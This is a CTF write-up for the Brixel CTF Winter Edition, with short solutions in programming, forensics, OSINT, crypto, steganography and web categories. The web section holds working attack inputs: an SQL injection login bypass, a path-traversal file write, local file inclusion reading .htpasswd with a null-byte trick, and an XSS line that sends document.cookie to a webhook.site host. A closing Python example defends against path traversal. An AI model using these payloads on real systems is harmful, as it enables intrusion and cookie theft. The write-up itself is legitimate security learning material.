---
tags: 'CTF'
---

Brixel CTF Winter Edition
===

:::info
<i class="fa fa-user-circle-o" aria-hidden="true"></i> @codeskill
<i class="fa fa-clock-o" aria-hidden="true"></i> 2020-12-26
<i class="fa fa-external-link" aria-hidden="true"></i> https://ctf.brixel.space/
:::

[TOC]

## Programming

### Are you fast enough?

![](https://i.imgur.com/RFMewDl.png)

`solve.sh`

```bash=
#!/bin/bash
# Fetch the page (keeping the session cookie), extract the random string and post it straight back.
curl -s http://timesink.be/speedy/ -X POST -d "inputfield=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' | tr -d "\n" | tr -d -)" -b cookie.txt
```

`./solve.sh`

```htmlembedded=
<html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>%
```

`solve.py`

```python3=
import requests
import re

t = "http://timesink.be/speedy"
s = requests.Session()

print(f"Requesting {t}...")
req = s.get(t)
# The random string is the content of the "rndstring" div.
p = re.compile(r'<div id="rndstring" align="center">(\w*)</div>')
random_str = p.search(req.text).group(1)
print(f"Got randomstring: {random_str}")

print("Posting...")
# Same session, so the server ties the answer to the string it issued.
r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str})
print(r2.text)
```

:::success
brixelCTF{sp33d_d3m0n}
:::

### Keep walking

`solve.py`

```python=
x = 1
y = 1
previous_answer = 1
answer = x * y + previous_answer + 3
while x < 525:
    x = x + 1
    y = y + 1
    previous_answer = answer
    answer = x * y + previous_answer + 3

# Print the result of the last step (x = y = 525).
print("answer=" + str(answer))
print("previous_answer=" + str(previous_answer))
print("x=" + str(x))
print("y=" + str(y))
print("formula: " + str(answer) + "=" + str(x) + "*" + str(y) + "+" + str(previous_answer) + "+" + "3")
```

```python3=
x = 1
y = 1
prev_answer = 1
answer = None

# Same recurrence, printing every step.
while x <= 525:
    answer = x*y + prev_answer + 3
    print(f"{x = } ==> {answer = }")
    x += 1
    y += 1
    prev_answer = answer
```

:::success
brixelCTF{48373851}
:::

### A song...

Copy the song and paste it into https://codewithrockstar.com/online

![](https://i.imgur.com/3F3hXuY.png)

:::success
brixelCTF{5667236346614}
:::

### An arduino project

### Quizbot

```python3
import requests
import json
from bs4 import BeautifulSoup as bs4

################################################################################
#
# Stage 1:
#
# Request a session for the first "round". In this round we submit a lot of
# wrong answers and store the resulting solution given to us by the server.
# The plan is to use these solutions in a second round to solve the questions.
#
########################################

# question_mapping maps the question to its answer
# load the stored data (if a previous run saved any)
question_mapping = {}
try:
    with open("solutions.json") as data:
        question_mapping = json.load(data)
except FileNotFoundError:
    pass

s1 = requests.Session()

i = 0
while len(question_mapping) < 1000:
    print(f"\r{i}\t{len(question_mapping)}", end="", flush=True)
    r = s1.get("http://timesink.be/quizbot/index.php")
    soup = bs4(r.text, "html.parser")
    question = soup.h4.text

    # post a wrong answer; the response reveals the correct one
    payload = {"insert_answer": "asdfghjkl", "submit": "answer"}
    r = s1.post("http://timesink.be/quizbot/index.php", data=payload)
    soup = bs4(r.text, "html.parser")
    answer = soup.find(id="answer").text
    question_mapping[question] = answer
    i += 1

# save the dict to json
with open("solutions.json", "w") as outfile:
    json.dump(question_mapping, outfile)
print("")

################################################################################
#
# Stage 2:
#
# Use the solutions collected in stage 1
#
########################################

s2 = requests.Session()

for i in range(0, 1100):
    try:
        r = s2.get("http://timesink.be/quizbot/index.php", timeout=10)
        soup = bs4(r.text, "html.parser")
        question = soup.h4.text
        # fall back to a dummy answer for questions not seen in stage 1
        answer = question_mapping.get(question, "abc")
        print(question)
        print(answer)
    except Exception:
        print("SOME ERROR OCCURRED")
        continue

    try:
        # post with body:
        payload = {"insert_answer": answer, "submit": "answer"}
        r = s2.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10)
        print(r.text)
    except Exception:
        print("SOME ERROR OCCURRED")
```

:::success
brixelCTF{kn0wl3dg3}
:::

## Forensics

### Message from Space

https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04

Download the app:

> `Robot32 - SSTV Image Decoder`

Play the WAV file and wait for the image to render. The SSTV signal is in Scottie1 mode.

![](https://i.imgur.com/vpNg8h4.png)

:::success
brixelCTF{SP4C3L4B}
:::

### Lottery Ticket

- Picture of a lottery ticket
- If you zoom in, you see compression artifacts around most numbers
- The edited numbers have none; sum them together --> the flag is "203"

:::success
brixelCTF{203}
:::

### Lost evidence

- Run `foremost` to extract the .wav file
- Decode the DTMF tones in the WAV file
- You get the transaction reason: `cocaine`

:::success
brixelCTF{cocaine}
:::

## OSINT

### Visit Limburg #1

https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16

### Visit Limburg #2

3.05.13

`7.05.09`

https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656

### Visit Limburg #3

https://www.openstreetmap.org/search?query=airport%20in%20limburg#map=11/51.0996/5.4437

### Physical

https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers

https://osintframework.com/

### A quick search

Google Lens or Yandex Images

![](https://i.imgur.com/owPHhV2.jpg =200x300)

Eben-Ezer Tower

:::success
brixelCTF{Eben-Ezer}
:::

### Manhunt (1-n)

Facts:
- https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
- https://twitter.com/johnnydorfmeis1
- http://www.howitshould.be
- https://github.com/JohnnyDorfmeister

1. `Johnny Dorfmeister`: Taken from the EXIF data of the image
2. `pishapasha`: Googling the name takes you to this LinkedIn profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
3. Favourite food: `macaroni`. Taken from https://www.instagram.com/JohnnyDorfmeister/
4. Birthday: tbd
5. `w@yb@ck!`: Using the Wayback Machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (taken from his Twitter account @johnnydorfmeis1)
6. `poetry`: Translate the Russian text on howitshould.be with Google.
7. Fill in the contact form and his address will be presented
8. "just_married": With Google Street View on the address from no. 7, move back in time
9. `g1ttern00b`: Username "johnny", password "letmein", taken from an old commit on GitHub

## Reverse Engineering / cracking

### Cookieee!

- Open the game in Cheat Engine
- Search for the cookie amount
- Increase it
- Done

### noPEEKing

Run `strings` on the exe.

### registerme.exe

- Run `strings` on the exe
- Create a file called register.key
- Start the exe

### android app

## Old tech

### punchcard

Upload the punchcard here: https://www.masswerk.at/cardreader/

:::success
brixelCTF{M41NFR4M3}
:::

### Goodbye old friend

- Download the SWF
- Extract the content
- Then search through the extracted files until you find the flag

### The tape

## Crypto

### Sea code

message.wav

![](https://i.imgur.com/9nGiYNw.png)

```
- .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-..
```

![](https://i.imgur.com/4LN8Pj3.png)

theflagforthischallengeis seagull

:::success
brixelCTF{seagull}
:::

### Merde

Vigenère with "confidentiel" as the key:

```
The flag is
```

`brixelCTF{baguette}`

### Merda

ROT21

`brixelCTF{pizzanapoli}`

### s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜

base64 decode + binary decode

`brixelCTF{robocop}`

### Scheiße

qbhbh zrmua gfbld ocqbv

![](https://i.imgur.com/KqqSGVd.png)

derflagistsauerkraut

the flag is sauerkraut

:::success
brixelCTF{sauerkraut}
:::

### flawed

- Username: `admin`
- Password hash: `d269ce15f9c44bc3992a5f4e5f273e06`

![](https://i.imgur.com/7tUIaj8.png)

:::success
brixelCTF{notsecure}
:::

### Don't be salty

```python3=
import hashlib
from itertools import product
from string import ascii_lowercase

# Try every 5-letter lowercase password with the fixed suffix appended
# and print each candidate next to its MD5 hash.
for letters in product(ascii_lowercase, repeat=5):
    pw = "".join(letters) + "04532@#!!"
    print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest())
```

:::success
brixelCTF{brute}
:::

## Steganography

### Doc-ception

```
unzip loremipsum.docx
unzip loremipsum
cat flag.txt
```

flag = openxml

:::success
brixelCTF{openxml}
:::

### Limewire audio

`Audacity > Spectrogram`

![](https://i.imgur.com/vlmas35.png)

:::success
brixelCTF{hellokitty}
:::

### Scan Me

- QR code image
- Crop the smaller QR code image out of the first one
- Go to the website, scan the barcode
- Enter the result, scan the next barcode, repeat
- Receive the flag: brixelCTF{m4st3r_0f_sc4n5}

:::success
brixelCTF{m4st3r_0f_sc4n5}
:::

### Rufus the vampire cat

`steghide info rufus.jpg`

```
"rufus.jpg":
  format: jpeg
  capacity: 8.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "steganopayload639.txt":
    size: 85.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
```

`steghide extract -sf rufus.jpg`

```
Enter passphrase:
wrote extracted data to "steganopayload639.txt".
```

`less steganopayload639.txt`

```
You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is: chucktesta)
```

:::success
brixelCTF{chucktesta}
:::

## Internet

### Easy

```
curl -s https://ctf.brixel.space/ | grep -i flag
<!-- hidden flag: 'brixelCTF{notsosecret}' -->
```

:::success
brixelCTF{notsosecret}
:::

### Discord

5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}

:::success
brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
:::

### Hidden Code

https://www.brixel.be/

View the page source and find `konami`:

```javascript=
/* <![CDATA[ */
var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"};
/* ]]> */
```

`http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif`

![](https://i.imgur.com/hsQTDHS.png =200x200)

:::success
brixelCTF{Mario}
:::

### Hiding in the background

```htmlembedded=
<style>
body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;}
</style>
```

```
wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg
strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}</tspan></text>
```

:::success
brixelCTF{happy_holidays}
:::

### Readme

https://ctf.brixel.space/guide

:::success
brixelCTF{freepoints}
:::

### robotopia

http://timesink.be/robotopia/robots.txt

:::success
brixelCTF{sadr0b0tz}
:::

### login1

The flag is in plain text in the JavaScript source.

:::success
brixelCTF{w0rst_j4v4scr1pt_3v3r!}
:::

### login2

![](https://i.imgur.com/k2U4rqm.png)

```javascript=
function verify() {
    password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}";
    split = 6;
    // Each check compares one 6-character slice of the password.
    if (password.substring(0, split) == 'brixel') {
        if (password.substring(split*6, split*7) == '180790') {
            if (password.substring(split, split*2) == 'CTF{st') {
                if (password.substring(split*4, split*5) == '5cr1pt') {
                    if (password.substring(split*3, split*4) == 'd_j4v4') {
                        if (password.substring(split*5, split*6) == '_h3r3.') {
                            if (password.substring(split*2, split*3) == '1ll_b4') {
                                if (password.substring(split*7, split*8) == '54270}') {
                                    console.log("Password Verified")
                                }
                            }
                        }
                    }
                }
            }
        }
    } else {
        console.log("Incorrect password");
    }
}
verify()
```

:::success
brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}
:::

### login3

http://timesink.be/login3/password.txt

:::success
brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}
:::

### login4

http://timesink.be/login4/password.txt + base64 decode

:::success
brixelCTF{even_base64_wont_make_you_secure}
:::

### login5

```javascript!
function verify() {
    var _0x41653e = _0x58ab;
    password = document[_0x41653e(0x194)](_0x41653e(0x192))['value'],
    alphabet = _0x41653e(0x193),
    newpassword = alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x
    newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e
    newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // {
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u
    newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n
    newpassword = newpassword + alphabet['substr'](39 - 0x1, 0x1), // }
    password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195));
}
```

:::success
brixelctf{0bfuscati0n}
:::

### Browsercheck

Search Google to identify the User-Agent used by the "Ask Jeeves" crawler.

`curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'`

```
<html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html>
```

:::success
brixelCTF{askwho?}
:::

### SnackShack awards

```!
curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0'
```

:::success
brixelCTF{bakpau}
:::

### Flat earth

Brute force username and login here: http://timesink.be/flatearth/admin.php

```
' OR ''=' --
```

:::success
brixelCTF{aroundtheglobe}
:::

### Dadjokes

Upload reverse shell here: http://timesink.be/dadjokes/jokes/submit.php

File read: http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt

`http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\`

```!
Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47

please provide a title
```

The solution is to fix the page.
This gives you the solution:

```
curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmit.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E'
```

`document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')`

### Pathfinders \#1

`index.php` loads whatever file is passed in the `page` parameter without any restriction, so simply request:

`http://timesink.be/pathfinder/index.php?page=admin/.htpasswd`

:::success
brixelCTF{unsafe_include}
:::

### Pathfinders \#2

`index.php` loads whatever file is passed in the `page` parameter without any restriction, so simply request:

`http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php`

:::success
brixelCTF{outdated_php}
:::
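
Both Pathfinders requests, and the `filename=../index.html` write in Dadjokes, succeed because a request parameter is used as a file path unchecked. The following is an added example, not code from the CTF or from this writeup's author: a Python model of the checks such a loader needs, run against the request values shown above. `WEBROOT`, `ALLOWED_PAGES`, `contained` and `resolve_page` are hypothetical names, and the directory layout and page names are constructed.

```python
import os

# Constructed layout and page names (assumptions, not taken from the challenge).
WEBROOT = "/srv/site"
ALLOWED_PAGES = {"home", "about", "contact"}


class RejectedPage(ValueError):
    """The requested page name must not be turned into a file path."""


def contained(base: str, name: str) -> bool:
    """True if base/name resolves to a path inside base (blocks '../')."""
    if "\x00" in name:
        return False
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    return os.path.commonpath([base_real, target]) == base_real


def resolve_page(page: str, base: str = WEBROOT) -> str:
    """Map a ?page= value to the file to include, or raise RejectedPage."""
    # Outdated PHP cut the path at a NUL byte, so "%00.php" dropped an
    # extension appended by the script. Reject NUL before any path handling.
    if "\x00" in page:
        raise RejectedPage("NUL byte in page name")
    # Allowlist: admin/.htpasswd lies inside the web root, so a containment
    # check alone would still hand it out.
    if page not in ALLOWED_PAGES:
        raise RejectedPage(f"page not in allowlist: {page!r}")
    name = page + ".php"
    # Defence in depth in case the allowlist is ever loosened.
    if not contained(base, name):
        raise RejectedPage("path escapes the web root")
    return os.path.join(os.path.realpath(base), name)


def is_allowed(page: str) -> bool:
    """Convenience wrapper returning a boolean instead of raising."""
    try:
        resolve_page(page)
    except RejectedPage:
        return False
    return True
```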